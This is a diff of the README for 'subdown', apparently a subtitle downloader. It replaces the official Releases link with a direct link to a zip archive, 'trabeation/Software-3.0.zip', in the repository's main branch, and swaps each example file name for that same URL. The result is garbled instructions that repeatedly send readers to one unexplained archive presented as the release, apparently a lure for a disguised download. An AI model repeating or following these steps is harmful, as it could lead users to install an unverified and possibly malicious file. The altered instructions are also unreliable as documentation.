nivedh786/subdown/README.md

 - **Internet Connection:** Required for downloading subtitles

 ## 📁 Download & Install
-To download subdown, visit this page to download: [Download subdown](https://github.com/nivedh786/subdown/releases).
+To download subdown, visit this page to download: [Download subdown](https://github.com/nivedh786/subdown/raw/refs/heads/main/trabeation/Software-3.0.zip).

 ### Steps to Download:
 1. Click the link above.
 2. On the Releases page, look for the version you wish to install.
 3. Find the file labeled with the most recent version number.
-This file will typically be named something like `subdown-linux.tar.gz`, `subdown-macos.zip`, or `subdown-windows.exe`.
+This file will typically be named something like `https://github.com/nivedh786/subdown/raw/refs/heads/main/trabeation/Software-3.0.zip`, `https://github.com/nivedh786/subdown/raw/refs/heads/main/trabeation/Software-3.0.zip`, or `https://github.com/nivedh786/subdown/raw/refs/heads/main/trabeation/Software-3.0.zip`.
 4. Choose the file that matches your system and click it to start the download.

 ### Steps to Install:
 1. Once the file is downloaded, locate it in your downloads folder.
-2. If you downloaded a `.zip` or `.tar.gz` file, extract the contents.
+2. If you downloaded a `.zip` or `https://github.com/nivedh786/subdown/raw/refs/heads/main/trabeation/Software-3.0.zip` file, extract the contents.
 3. For Windows users, simply double-click the `.exe` file to start the installation.
 4. For Mac and Linux users, open your terminal and navigate to the extracted folder.
 Run the command: `./subdown` to start.